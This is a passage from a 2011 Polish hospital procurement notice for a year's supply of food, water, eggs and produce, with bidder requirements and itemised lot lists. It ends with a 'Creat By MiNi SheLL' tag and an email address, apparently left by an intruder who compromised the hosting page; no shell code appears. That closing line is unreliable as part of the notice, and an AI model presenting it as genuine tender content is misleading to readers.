3)	  Pełnomocnictwo do podpisania oferty w toczącym się postępowaniu (pełnomocnictwo do zaciągania zobowiązań w imieniu Wykonawcy), dołączone do oferty, o ile nie wynika z innych dokumentów załączonych przez Wykonawcę. 
4)	  Oświadczenie Wykonawcy, w trybie art. 44 ustawy, dotyczące spełnienia warunków udziału w postępowaniu, zgodnie z art. 22 ustawy, ściśle według formularza stanowiącego ZAŁĄCZNIK NR 3 do SIWZ.
5)	 Pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia - o ile dotyczy Wykonawcy.
6)	  Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
7)	  Zaświadczenie o wpisie do rejestru zakładów podlegających urzędowej kontroli Państwowej Inspekcji Sanitarnej Państwowej lub organu Inspekcji Weterynaryjnej - na podstawie art. 62 ust. 1 pkt 4 ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienie ( Dz. U. 171,poz. 1225 z późn. zmianami) o ile dotyczy.
8)	  Potwierdzenie o zgłoszeniu działalności gospodarczej w zakresie produkcji, składowania, konfekcjonowania i obrotu artykułami rolno-spożywczymi wydane przez Wojewódzkiego Inspektora Jakości Handlowej Artykułów Rolno-Spożywczych, właściwego ze względu na miejsce zamieszkania lub siedzibę Wykonawcy zgodnie z art. 12 ust. 1 ustawy z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno-spożywczych (Dz. U. z 2005 Nr 187, poz. 1577 ze zm.) o ile dotyczy.
9)	  Potwierdzenia wdrożonego systemu HACCP, o ile dotyczy,  w jednej z następujących form: 
a)	certyfikatu systemu HACCP wydanego przez firmy posiadające akredytacje i uprawnienia Polskiego Centrum Akredytacji z siedzibą w Warszawie lub krajowej organizacji akredytacyjnej dla danego kraju albo
b)	zaświadczenie właściwego organu Państwowej Inspekcji Sanitarnej lub organu Inspekcji Weterynaryjnej o sprawowaniu nadzoru nad stosowaniem zasad wdrożonego sytemu HACCP. Przedłożone zaświadczenie winno potwierdzać, że Wykonawca wdrożył oraz stosuje zasady systemu HACCP - podstawa prawna art. 59 i 73 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2006 Nr 171 poz. 1225.).
10)	 Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,  
 zamiast dokumentu, o którym mowa w pkt 6 składa odpowiedni dokument lub dokumenty,   
 wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające  
 odpowiednio, że:
 a ) nie otwarto jego likwidacji ani nie ogłoszono upadłości - dokument wystawiony nie wcześniej   
     niż 6 miesięcy przed upływem terminu składania ofert.
11)	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 10, zastępuje się je dokumentem  zawierającym oświadczenie Wykonawcy złożone przed notariuszem, właściwym organem sądowym, administracyjnym, albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - w zakresie dat wystawienia dokumentów, przepisy punktu 10 stosuje się odpowiednio.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Kupujący przewiduje możliwość zmiany umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Sprzedający, jeżeli konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Kupującego, a także dotyczą: 
1.	zmiany świadczenia Sprzedającego na świadczenie lepszej jakości przy zachowaniu tożsamości towaru,
2.	wydłużenia terminu wykonania umowy z powodu okoliczności niezależnych od Sprzedającego,
3.	zmiany danych Sprzedającego ( np. zmiana siedziby, adresu, nazwy),</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.5wszk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ZAMÓWIENIA PUBLICZNE 5 WOJSKOWEGO SZPITALA KLINICZNEGO SP ZOZ UL. WROCŁAWSKA 1-3; 30-901 KRAKÓW GABINET RADCY PRAWNEGO BUDYNEK NR 32.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2011 godzina 11:00, miejsce: KancelariA Szpitala (budynek komendy)., ul. Wrocławska 1-3, 30 - 901 Kraków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET nr I..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	
Kod CPV	
Ilość / j.m.	
 kwota netto
 za j.m.	
wartość netto 	
VAT	
wartość brutto
1.	Chleb mieszany żytnio-pszenny, krojony /1 szt. a  0.6 kg/
Termin przydatności do spożycia 4 dni   	1581000-6	20 000kg 
				
2.	Bułka pszenna  /1 szt. a 0.05 kg/
Termin przydatności do spożycia 1 dzień   	15811400-0	12 000 kg				
3.	Bułka graham  / 1 szt. a 0.05 kg/
Termin przydatności do spożycia 1 dzień   	15811400-0	    1 200kg
				
4.	Pączki  /1 szt. a 0,15kg/
Termin przydatności do spożycia 1 dzień    	15812000-3	     60kg    
				
5.	Babka drożdżowa /1szt. a 0.5 kg/
Termin przydatności do spożycia 4 dni    	15812000-3	      70kg
				
6.	Ciasto piaskowe  /1 szt. a 0.5 kg/
Termin przydatności do spożycia 4 dni    	15812000-3	      120 kg
				
7.	Makowiec / 1 szt. a 1 kg/ 
Termin przydatności do spożycia  4 dni   	15812000-3	       25kg
				
8.	Bułka tarta / 1 op. a 1 kg/
(opakowanie zbiorcze 10 kg). 
Termin przydatności do spożycia 30 dni    
	15811400-0	     520kg				
9.	Drożdżówka z nadzieniem  wykończona kruszonką o masie jednostkowej 100g,                                                                  Termin przydatności do spożycia 2 dni	15812100-4 	100 kg				
RAZEM:.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET nr  II..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	
Kod CPV	
Ilość / j.m.	
 kwota netto
 za j.m.	
wartość netto 	
VAT	
wartość brutto
1.	Cukier kryształ /a 1 kg/                 (opakowanie zbiorcze 10 kg)
Termin przydatności do spożycia  24 miesiące   	15831000-2	  700 op.				
2.	Mąka pszenna typ 500 /a 1 kg/      (opakowanie zbiorcze 10 kg) Termin przydatności do spożycia  12 miesięcy   
	15612100-2	  480 op.
				
3.	Kasza manna /a 1 kg/                    (opakowanie zbiorcze 10 kg)
Termin przydatności do spożycia  6 miesięcy   	03211900-2	  120 op.				
4.	Płatki owsiane /a 1 kg/                  (opakowanie zbiorcze 10 kg)
Termin przydatności do spożycia 6 miesięcy    	15613380-5	61 op.
				
5.	Mąka ziemniaczana /a  0.5 kg/     (opakowanie zbiorcze 5 kg)
Termin przydatności do spożycia 12 miesięcy    	15620000-0	22op.
				
9.
	Kakao /a 0.1 kg/                             (opakowanie zbiorcze 1.20 kg) Termin przydatności do spożycia  18 miesięcy   	15841000-5
	6 op.
				
							
10.	Budyń bez cukru-śmietankowy          /a  0.06 kg/                                            (opakowanie zbiorcze 1.5 kg)     
  Termin przydatności do spożycia 12 miesięcy    	15332200-6	107 p.				
11.	Galaretka owocowa- różne smaki  typu NESTLE /a 0.075kg/                                         (opakowanie zbiorcze 1.65kg )
Termin przydatności do spożycia 12 miesięcy    	15332240-8	34 op.
				
12. 	Makaron 2 -jajeczny różny(nitki, łazanki, kolanka, muszelki, świderki) /a 1 kg/
(opakowanie zbiorcze 10 kg)
Termin przydatności do spożycia       6 miesięcy	15613300-1	240op.
				
13.	Kasza jęczmienna perłowa średnia /a  1 kg/
(opakowanie zbiorcze 10 kg)
Termin przydatności do spożycia     6 miesięcy	03211900-2	105 op.
				
14.	Kasza gryczana /a  1 kg/
(opakowanie zbiorcze 10 kg)
Termin przydatności do spożycia     6 miesięcy	03211900-2	22 op.
				
15.	Groch łuskany - połówki /a  0.5 kg/
(opakowanie zbiorcze 10 kg)
Termin przydatności do spożycia   12 miesięcy	03212213-6	12 op.
				
16.
	Fasola  JAŚ - duży /a 0.5 kg/
(opakowanie zbiorcze 10 kg)
Termin przydatności do spożycia   12 miesięcy	03221210-1	32 op.				
17.	Ryż długoziarnisty biały /a  1 kg/
(opakowanie zbiorcze 10 kg)
Termin przydatności do spożycia      12 miesięcy 	15614100-6	290 op.				
18.
	Pasta pomidorowa 30%   /a 0.85 kg/opakowanie metalowe                           (opakowanie zbiorcze 6.80kg)
Termin przydatności do spożycia    12 miesięcy	15331134-5	156 op.				
19.
	Sok pomidorowy / a 1 L /szt./
(opakowanie zbiorcze 12 szt.)
Termin przydatności do spożycia       6 miesięcy	15322100-2	160 op.				
20.	Sok owocowy  bez cukru /a 1 L/szt./
(opakowanie zbiorcze 12 L/szt.)
Termin przydatności do spożycia            6 miesięcy	15321000-4	8 op.				
21.
	Papryka konserwowa /a 0.9 kg/
(opakowanie zbiorcze 7.2 kg)
Termin przydatności do spożycia            18 miesięcy	15331136-9	120 op.				
22.	Ogórek konserwowy / a  0.9 kg/
(opakowanie zbiorcze 7.2 kg) 
Termin przydatności do spożycia            18 miesięcy	15331000-7	126 op.				
23.	Fasolka szparagowa,- konserwowa /a  2.6 kg/
Luzem (puszka 2.60 kg)
Termin przydatności do spożycia            12miesięcy	15331131-4	490 puszek.				
24.	Groszek konserwowy /a 0.4 kg/
( opakowanie zbiorcze  4 kg)
Termin przydatności do spożycia            18 miesięcy	15331400-1	125 op.				
25.	Kukurydza konserwowa /a  0.4kg/
(opakowanie zbiorcze 4 kg) 
Termin przydatności do spożycia            18 miesięcy	15331400-1	72 op.				
26.	Musztarda kremowa o smaku łagodnym /a  0.2 kg/
(opakowanie zbiorcze 2 kg)_
Termin przydatności do spożycia            6 miesięcy	15871250-1	216 op.				
27.	Keczup łagodny /a 0.45 kg/
(opakowanie zbiorcze  7.2 kg)
Termin przydatności do spożycia            6 miesięcy	15871123-5	86 op.				
28.	Olej rzepakowy  /a 1L/szt./
(opakowanie zbiorcze 15 L /szt.)
Termin przydatności do spożycia            6 miesięcy	15411100-3	133 op.				
29.
 	Pieczywo ryżowe naturalne              /a 0.10kg/
(opakowanie zbiorcze  2.00 kg)
Termin przydatności do spożycia            6 miesięcy	15821130-9	18 op.				
30.
	Sucharki  /a 0.29kg/
(opakowanie zbiorcze 5.8 kg)
Termin przydatności do spożycia            6 miesięcy	15821150-5	55 op.				
31.	Herbatniki słodkie  z marmoladą /a 0.16 kg/
(opakowanie zbiorcze  3.2 kg)
Termin przydatności do spożycia            6 miesięcy	15821200-1	5 op.				
32.
	Biszkopty wrocławskie /a  0.12 kg/
(opakowanie zbiorcze 2.4 kg)
Termin przydatności do spożycia            6 miesięcy	15820000-2	170 op.				
33.
	Żelatyna spożywcza  wieprzowa     /a  0.05kg/
(opakowanie zbiorcze  1.5 kg)
Termin przydatności do spożycia            6 miesięcy	03142300-1	10 op.				
34.
	Dżem z czarnej porzeczki /a  0.9 kg/
(opakowanie zbiorcze 7.2 kg) 
Termin przydatności do spożycia            6 miesięcy	15332293-4	85 op.				
35.	Marmolada wieloowocowa             /a  0.9 kg/
(opakowanie zbiorcze 7.2 kg)
Termin przydatności do spożycia            12  miesięcy	15332230-5	10 op.				
36.	Powidło śliwkowe /a 0.3kg/
(opakowanie zbiorcze 2.7 kg)
Termin przydatności do spożycia            12  miesięcy	15332270-7	120 op.				
37.	Miód naturalny /a 0.9 kg)
(opakowanie zbiorcze 7.2 kg)
Termin przydatności do spożycia            12  miesięcy	03142100-9	28 op.				
38.	Maggi  do zup w płynie typu NESTLE w szklanych kwadratowych butelkach /a 1L/szt./
(opakowanie zbiorcze  6 L/szt.)
Termin przydatności do spożycia           18  miesięcy	15870000-7	106 op.				
39.	Kucharek  do potraw /a 1 kg/
(opakowanie zbiorcze 15 kg)
Termin przydatności do spożycia           12 miesięcy	15893000-4	30 op.				
40.	Przyprawa do drobiu /a  1 kg/
(opakowanie zbiorcze 15 kg)
Termin przydatności do spożycia            12 miesięcy	15872000-1	  3op.				
41	Pieprz naturalny mielony /a 1. kg/
Luzem
Termin przydatności do spożycia           18  miesięcy	15870000-7	  35kg				
42.	Pieprz ziołowy /a 0.02kg/
(opakowanie zbiorcze 0.5 kg
Termin przydatności do spożycia            18 miesięcy	15872000-1	  8 op.				
43.	Papryka słodka mielona /a 1 kg/
Luzem
Termin przydatności do spożycia    18  miesięcy	15872000-1	  15 kg				
44.	Liść laurowy /a  1 kg/
Luzem
Termin przydatności do spożycia           18 miesięcy	15872000-1	   4 kg				
45.	Kminek  /a  1.kg /
Luzem
Termin przydatności do spożycia           18  miesięcy	15872000-1	  11 kg				
46.	Ziele angielskie /a 0.02 kg/
(opakowanie zbiorcze 0.5 kg)_
Termin przydatności do spożycia             18 miesięcy	15872000-1	  20 op.				
47.	Kwasek cytrynowy /a  1 kg /
Luzem
Termin przydatności do spożycia            18 miesięcy	15800000-6	  55kg				
48.	Majeranek /a  0.2 kg /
(opakowanie zbiorcze 1 kg) 
Termin przydatności do spożycia            18 miesięcy	15872000-1	    10 op.      				
49.	Ocet spirytusowy /a  0.5 L/szt./
(opakowanie zbiorcze 10 L)
Termin przydatności do spożycia            18 miesięcy	15871100-5	  44 op.				
50.	Żurek /a  0.5 L /
(opakowanie zbiorcze 6 L)
Termin przydatności do spożycia            30 dni	15610000-7	  100 op.				
51.	Chrzan tarty w occie / a 0.26 kg/    
(opakowanie zbiorcze 3.90 kg)
  Termin przydatności do spożycia            90 dni	15871000-4	  130 op.				
52.	Zaprawa cytrynowa /a 1L/szt./
(opakowanie zbiorcze 6 L/szt.)
  Termin przydatności do spożycia            18  miesięcy	15871200-6	   33 op.				
53.	Sól jodowana /a  1 kg/
(opakowanie zbiorcze 25 kg)
  Termin przydatności do spożycia            18  miesięcy	15872400-5	   80 op.				
54.	Cynamon /a  0.015kg/
(opakowanie zbiorcze 0.375 kg)
Termin przydatności do spożycia            18  miesięcy	15872000-1	     8 op.				
55.	Majonez delikatesowy /a  0.4 kg/ 
(opakowanie zbiorcze 3.20kg)
Termin przydatności do spożycia            30 dni	15871273-8	  85 op.				
56.	Kisiel owocowy /a 0.04kg/
(opakowanie zbiorcze   1.2 kg)
Termin przydatności do spożycia            6 miesięcy	15800000-6	  30 op.				
57.	Cukier wanilinowy /a  0.032/
Opakowanie zbiorcze  0.8 kg 
Termin przydatności do spożycia            6 miesięcy	15830000-5	10op.				
58.	Mleko w proszku -  zawartość tłuszczu 26%    /a 0.4 kg/
(opakowanie zbiorcze 4  kg)
Termin przydatności do spożycia            6 miesięcy	15511700-0	5 op.				
59.	Śliwka suszona/ a 0.20 kg/                                opakowanie zbiorcze 1.20 kg                                                termin przydatności do spożycia              12 miesięcy	15332410-1	  5op.				
60.	cukier puder /a 0.5 kg/,                                 opakowanie zbiorcze 5 kg
Termin przydatności do spożycia  24 miesiące   	15831000-2	6op.				
61.	Proszek do pieczenia /a 0.036 kg/ (opakowanie zbiorcze 0.90 kg) termin przydatności do spożycia 12 miesięcy		8 op.				
62.	pieczarka marynowana/a 0.760 kg/ 
(opakowanie zbiorcze 6.08 kg) termin przydatności do spożycia 12 miesięcy		28 op.				
63.	rodzynki sułtańskie /a  010 kg/ (opakowanie zbiorcze 1.20 kg)
termin przydatności do spożycia 12 miesięcy		3op.				
64.	koncentrat buraczany /a  300ml/ pakowany w butelki szklane - 0.38 kg, (opakowanie zbiorcze 5.70 kg
termin przydatności do spożycia 12 miesięcy
		12 op.				
65.	pieprz naturalny w ziarenkach /a 0.02/                                                        (opakowanie zbiorcze 0.50 kg),                                                                                               termin przydatności do spożycia 6 miesięcy		5 op.				
66.	susz owocowy (mieszanka) /a 0.25 kg/ opakowanie zbiorcze 3.00 kg
termin przydatności do spożycia 6 miesięcy
		2 op. 				
RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET nr III..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	
Kod CPV	
Ilość / j.m.	
 kwota netto
 za j.m.	
wartość netto 	
VAT	
wartość brutto
1	Kawa zbożowa /a 0.5 kg/             (opakowanie zbiorcze 3 kg)
Termin przydatności do spożycia  12 miesięcy	15862000-8	86 op.				
2	Kawa naturalna ziarnista                    /a1 kg/   I kl.                                                    (opakowanie zbiorcze 6 kg)
Termin przydatności do spożycia  18 miesięcy	15861100-2	6op.				
3	Kawa naturalna rozpuszczalna   /a 0.2 kg/                                                  (opakowanie zbiorcze 2.40 kg)
Termin przydatności do spożycia 18 miesięcy	15861000-1	2 op.				
4	Herbata liściasta  czarna  /a0.1 kg/
(opakowanie zbiorcze 2 kg)
Termin przydatności do spożycia18 miesięcy	15863200-7	90 op.				
5	Herbata w saszetkach  czarna ze sznureczkiem /a200g/
(opakowanie zbiorcze 0.80 kg)
Termin przydatności do spożycia    18 miesięcy	15841000-3	20 op.
				
6	Herbata w saszetkach zielona                           /a50 g/ (opakowanie zbiorcze  0.20 kg) Termin przydatności do spożycia 18 miesięcy	15863100-6	10 op.
				
7	Herbata   owocowa  /a0.1 kg/
(opakowanie zbiorcze 2 kg)
Termin przydatności do spożycia18 miesięcy     	15863200-7	 90 op.				
RAZEM:.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET nr IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	
Kod CPV	
Ilość / j.m.	
 kwota netto
 za j.m.	
wartość netto 	
VAT	
wartość brutto
1.	Ryba wędzona Makrela luz
(opakowanie zbiorcze 3 kg)
Termin przydatności do spożycia 7 dni	15234000-7	46 op.				
2.	Śledź marynowany w zalewie octowej (opakowanie zbiorcze 4 kg)
Termin przydatności do spożycia       21 dni	03311300-5	35 op.				
3.	Konserwa rybna - śledź w sosie pomidorowym /a0.17 kg/szt./
(opakowanie zbiorcze 4.08 kg/24 szt.)
. Termin przydatności do spożycia   24 miesiące    	15241200-1	25 op.				
	                             RAZEM:.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET nr V..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	
Kod CPV	
Ilość / j.m.	
 kwota netto
 za j.m.	
wartość netto 	
VAT	
wartość brutto
1. 	Mieszanka kompotowa /a 2.5 kg/
luz
termin przydatności do spożycia 12 miesięcy	15331170-9	700 op.				
2.	Szpinak mrożony - mielony       /a2,5 kg/ luz                                                                             termin przydatności do spożycia 12 miesięcy	15331170-9	700 op.				
3.	Filet mrożony -  MINTAJ          25% glazury /a5 kg/ luz
termin przydatności do spożycia 12 miesięcy	03310000-5	  400 op.				
4.	Kalafior  mrożony /a2.50 kg /   luz
termin przydatności do spożycia 12 miesięcy	03221420-6	120 op.				
5.
	Brokuł  mrożony  /a 2.5 kg/      luz
termin przydatności do spożycia 12 miesięcy 	03221430-9	180op.				
RAZEM:.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PAKIET nr VI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	
Kod CPV	
Ilość / j.m.	
kwota netto
za  j.m.	
wartość netto	
VAT	
wartość brutto
1.	Naturalna woda niegazowana 
BUTLA 19 L wraz z nieodpłatną dzierżawą 14 sztuk dystrybutorów , oraz nieodpłatną konserwacją w/w urządzeń	15981000-8	200 szt.				
RAZEM:.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PAKIET nr VII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	
Kod CPV	
Ilość / j.m.	
kwota netto
za j.m.	
wartość netto	
VAT	
wartość brutto
1.	Naturalna woda mineralna gazowana PET 0.5 L (opakowanie zbiorcze 6 L)	15981000-8	30 op.				
2.	Naturalna woda mineralna niegazowana PET 0.5 L                       (opakowanie zbiorcze 6L)	15981000-8	30 op.				
3.	Naturalna woda mineralna gazowana PET 1.5 L (opakowanie zbiorcze 9 L)	15981000-8	3 500 op.				
4.	Naturalna woda mineralna niegazowana PET 1.5 L (opakowanie zbiorcze 9 L)	15981000-8	500 op.				
                                                                                 RAZEM:.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PAKIET nr VIII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	
Kod CPV	
Ilość / j.m.	
kwota netto
za j.m.	
wartość netto	
VAT	
wartość brutto
1.	Pomarańcza                                                / waga 1 szt. =około 250g/, (opakowanie zbiorcze 5 -  10 kg)	03222220-1	800  kg				
2.	Grapefruit                                                     /waga 1 szt. = około 400g/, (opakowanie zbiorcze 9 - 18 kg) 	03222230-4	700  kg				
3.	Mandarynka                                          / waga 1 szt. = około 150g/,                             (opakowanie zbiorcze 4.5 - 12 kg)		50  kg				
4.	Cytryna                                            (opakowanie zbiorcze 1 - 5 kg)	03222210-8	110  kg				
                                                                                 RAZEM:.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> PAKIET nr IX..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	Kod CPV	Ilość / j.m.	Ilość / j.m.	wartość netto	VAT	wartość brutto
1.	Jaja świeże spożywcze klasy A    (L - jaja określane w kategorii wagowej jako duże, ważące od 63 d0 73g)
	03142500-3	45360 szt.				
Razem:.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com